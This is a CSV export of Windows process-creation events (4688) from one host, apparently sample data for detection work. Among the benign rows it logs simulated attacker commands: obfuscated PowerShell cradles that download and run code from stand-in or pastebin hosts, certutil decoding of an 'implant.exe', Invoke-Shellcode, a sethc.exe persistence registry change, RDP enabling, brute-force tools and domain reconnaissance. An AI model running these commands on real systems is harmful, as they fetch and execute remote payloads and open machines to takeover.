103,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.930,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x156c,C:\Windows\System32\win32calc.exe,%%1936,0x154c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.930
104,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.977,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1580,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.977
105,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.053,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15a0,C:\Windows\System32\win32calc.exe,%%1936,0x1580,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.053
106,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.100,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15b4,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell.exe -c ""$a = 'Download'+'String'+""(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\evil.ps1;""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.100
107,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.173,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15d4,C:\Windows\System32\win32calc.exe,%%1936,0x15b4,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.173
108,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.220,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15e8,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(""{2}{0}{1}""-f ':/','/paste','tp')+'bin/'+'raw/'+(""{1}{0}""-f'Em17','pqCw')));}",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.220
109,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.287,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1608,C:\Windows\System32\win32calc.exe,%%1936,0x15e8,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.287
110,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x161c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c "".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\Users\$env:UserName\AppData\Local\Temp\kittens1.jpg';""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.337
111,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.407,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x163c,C:\Windows\System32\win32calc.exe,%%1936,0x161c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.407
112,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.453,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1650,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c "".\n^e^t u^se^r""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.453
113,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.517,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1670,C:\Windows\System32\win32calc.exe,%%1936,0x1650,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.517
114,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.567,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1684,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,.\powershell -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.567
115,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.633,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16a4,C:\Windows\System32\win32calc.exe,%%1936,0x1684,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.633
116,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.683,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16b8,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c ""echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.683
117,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.747,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16d8,C:\Windows\System32\win32calc.exe,%%1936,0x16b8,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.747
118,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.793,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16ec,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c ""echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.793
119,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.867,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x170c,C:\Windows\System32\win32calc.exe,%%1936,0x16ec,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.867
120,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.767,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xa08,C:\Diagnostics\UserTmp\certutil.exe,%%1936,0xbc8,certutil -decode delme.b64 implant.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.767
121,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.833,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x4e8,C:\Windows\System32\win32calc.exe,%%1936,0xa08,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\certutil.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.833
122,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.947,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x240,C:\Diagnostics\UserTmp\implant.exe,%%1936,0xbc8,implant.exe k111,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.947
123,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.003,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1250,C:\Diagnostics\UserTmp\implant.exe,%%1936,0xbc8,implant.exe 81ed03caf6901e444c72ac67d192fb9c,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.003
124,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.067,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x140c,C:\Diagnostics\UserTmp\implant.exe,%%1936,0xbc8,implant.exe -b -t -m,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.067
125,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.123,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x142c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c ""echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme"" ",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.123
126,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.160,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1448,C:\Windows\System32\win32calc.exe,%%1936,0x140c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\implant.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.160
127,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1450,C:\Windows\System32\win32calc.exe,%%1936,0x240,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\implant.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.167
128,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1458,C:\Windows\System32\win32calc.exe,%%1936,0x1250,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\implant.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.167
129,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1498,C:\Windows\System32\win32calc.exe,%%1936,0x142c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.337
130,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.393,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14ac,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell -Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.393
131,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.460,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14cc,C:\Windows\System32\win32calc.exe,%%1936,0x14ac,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.460
132,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.513,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e0,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,.\powershell Invoke-Shellcode.ps1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.513
133,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:35:15.673,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\sppsvc.exe,%%1936,0x230,C:\Windows\system32\sppsvc.exe,C:\Windows\System32\services.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:35:15.673
134,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:35:16.060,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13a8,C:\Windows\System32\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\system32\wbem\wmiprvse.exe -Embedding,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:35:16.060
135,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:35:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:35:26.010
136,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.610,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1500,C:\Windows\System32\win32calc.exe,%%1936,0x14e0,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.610
137,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.670,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1514,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,.\powershell Invoke-ReverseDnsLookup.ps1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.670
138,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.740,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1534,C:\Windows\System32\win32calc.exe,%%1936,0x1514,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.740
139,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.847,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x154c,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell -command ""(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.847
140,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.160,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1490,C:\Windows\System32\net.exe,%%1936,0xbc8,net localgroup Administrators,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.160
141,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.183,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1464,C:\Windows\System32\net1.exe,%%1936,0x1490,C:\Windows\system32\net1 localgroup Administrators,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.183
142,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.233,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x142c,C:\Windows\System32\whoami.exe,%%1936,0xbc8,whoami,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.233
143,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.283,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14b0,C:\Windows\System32\HOSTNAME.EXE,%%1936,0xbc8,hostname,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.283
144,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.317,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14c0,C:\Windows\System32\NETSTAT.EXE,%%1936,0xbc8,netstat -an,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.317
145,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.440,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14fc,C:\Windows\System32\net.exe,%%1936,0xbc8,net user Bob1 /domain,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.440
146,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.457,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14f0,C:\Windows\System32\net1.exe,%%1936,0x14fc,C:\Windows\system32\net1 user Bob1 /domain,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.457
147,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.483,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e8,C:\Windows\System32\net.exe,%%1936,0xbc8,net user BobX /domain,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.483
148,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x152c,C:\Windows\System32\net1.exe,%%1936,0x14e8,C:\Windows\system32\net1 user BobX /domain,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.500
149,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.520,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1520,C:\Windows\System32\net.exe,%%1936,0xbc8,"net group ""Domain Admins"" /domain",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.520
150,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.533,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1514,C:\Windows\System32\net1.exe,%%1936,0x1520,"C:\Windows\system32\net1 group ""Domain Admins"" /domain",C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.533
151,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.553,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1550,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rUnDlL32 /C ShEll32Control_RanDLL.dll,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.553
152,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.570,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1560,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg query add mscfile\\\\open,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.570
153,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.620,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1584,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg add Image File Execution Options sethc.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.620
154,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.677,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1580,C:\Diagnostics\UserTmp\ftp.exe,%%1936,0xbc8,.\ftp -s:C:\RECYCLER\xxppyy.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.677
155,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.727,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15c0,C:\Diagnostics\UserTmp\dubrute.exe,%%1936,0xbc8,.\dubrute.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.727
156,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.777,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1600,C:\Diagnostics\UserTmp\nlbrute.exe,%%1936,0xbc8,.\nlbrute.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.777
157,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.827,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15f0,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg add ""HKLM\system\CurrentControlSet\Control\Terminal Server"" /v ""fDenyTSConnections"" /t REG_DWORD /d 0x1 /f",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.827
158,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.880,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x162c,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg add ""HKLM\system\CurrentControlSet\Control\Terminal Server"" /v ""fDenyTSConnections"" /t REG_DWORD /d 0x0 /f",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.880
159,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.923,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x166c,C:\Windows\System32\net.exe,%%1936,0xbc8,net use v: \\tsclient\c,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.923
